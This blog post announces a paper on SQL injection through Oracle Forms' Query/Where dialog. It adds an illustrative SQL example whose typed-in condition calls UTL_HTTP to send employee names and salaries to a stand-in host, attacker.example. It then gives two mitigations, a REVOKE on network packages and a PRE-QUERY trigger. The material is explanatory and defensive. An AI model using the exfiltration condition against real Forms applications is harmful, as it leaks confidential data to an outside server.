Alex Kornbrust has released a new paper "SQL Injection in Oracle Forms"
April 12th, 2005 by Pete
I just got an email from Alex letting me know that he has released a new paper called "SQL Injection in Oracle Forms". It describes a SQL injection issue present in every default installation of Oracle Forms: from Enter-Query mode a user can open the "Query/Where" window and type an arbitrary WHERE clause, which Forms appends to its generated query without any checking. Alex demonstrates how a condition that calls UTL_HTTP can send the results of the query to an external web site, and he also describes simple fixes for the problem.
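To make the mechanism concrete, here is an added example of the attack shape and two mitigations. It is my own illustration, not code from Alex's paper or from Oracle; the table, columns, host name and the Forms trigger are hypothetical, and the timing assumption on the trigger is noted inline.

```sql
-- Added example (not from the paper or this post).  Table EMP, its columns and
-- attacker.example are constructed for illustration.

-- 1. Attack shape.  With a Forms block based on EMP in Enter-Query mode, the user
--    types '&' into a field and executes the query; Forms opens the Query/Where
--    dialog and appends whatever is typed there, unchecked, to its WHERE clause.
--    Typed into the dialog (attacker input, one line):
--
--      1=1 or utl_http.request('http://attacker.example/?d=' || ename || ':' || sal) is not null
--
--    Forms then runs roughly the statement below.  UTL_HTTP.REQUEST is evaluated
--    per row, so every fetched row is sent to the attacker's web server as an
--    HTTP GET before it is ever displayed on screen.
SELECT empno, ename, sal
  FROM emp
 WHERE (1=1 OR utl_http.request('http://attacker.example/?d=' || ename || ':' || sal) IS NOT NULL);

-- 2. Mitigation A (database side, run as SYS): take the network packages away
--    from PUBLIC so a Forms user's session cannot reach out.  List existing
--    grants first; the REVOKE affects every schema, so re-grant to the
--    specific accounts that legitimately need it.
SELECT grantee, table_name
  FROM dba_tab_privs
 WHERE table_name IN ('UTL_HTTP', 'UTL_TCP', 'UTL_SMTP')
   AND privilege = 'EXECUTE';
REVOKE EXECUTE ON utl_http FROM PUBLIC;

-- 3. Mitigation B (Forms side, assumption): a block-level PRE-QUERY trigger that
--    refuses to execute when any item of the block holds a leading '&' or ':',
--    the characters that open the Query/Where dialog.  This assumes PRE-QUERY
--    fires with the user's criteria still in the items; verify against your
--    Forms version before relying on it.  Built-ins used: GET_BLOCK_PROPERTY,
--    GET_ITEM_PROPERTY, NAME_IN, MESSAGE.
DECLARE
  v_block VARCHAR2(30)   := :SYSTEM.CURRENT_BLOCK;
  v_item  VARCHAR2(30)   := GET_BLOCK_PROPERTY(v_block, FIRST_ITEM);
  v_val   VARCHAR2(4000);
BEGIN
  WHILE v_item IS NOT NULL LOOP
    v_val := NAME_IN(v_block || '.' || v_item);
    IF SUBSTR(LTRIM(v_val), 1, 1) IN ('&', ':') THEN
      MESSAGE('Free-form query conditions are not allowed in this form.');
      RAISE FORM_TRIGGER_FAILURE;
    END IF;
    v_item := GET_ITEM_PROPERTY(v_block || '.' || v_item, NEXTITEM);
  END LOOP;
END;
```

The REVOKE is the fix that does not depend on every form being patched: a user who can still type into the Query/Where dialog can run arbitrary SQL functions, but without EXECUTE on UTL_HTTP (and UTL_TCP, UTL_SMTP) there is no network channel to push results out. From memory rather than from this post, the Forms-side control Oracle later shipped is the FORMS_RESTRICT_ENTER_QUERY environment variable, which disables the dialog outright; treat that name as unverified here.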
The paper is also available in German.
This issue should be fixed in the Critical Patch Update (CPU) of April 12, which is due very soon!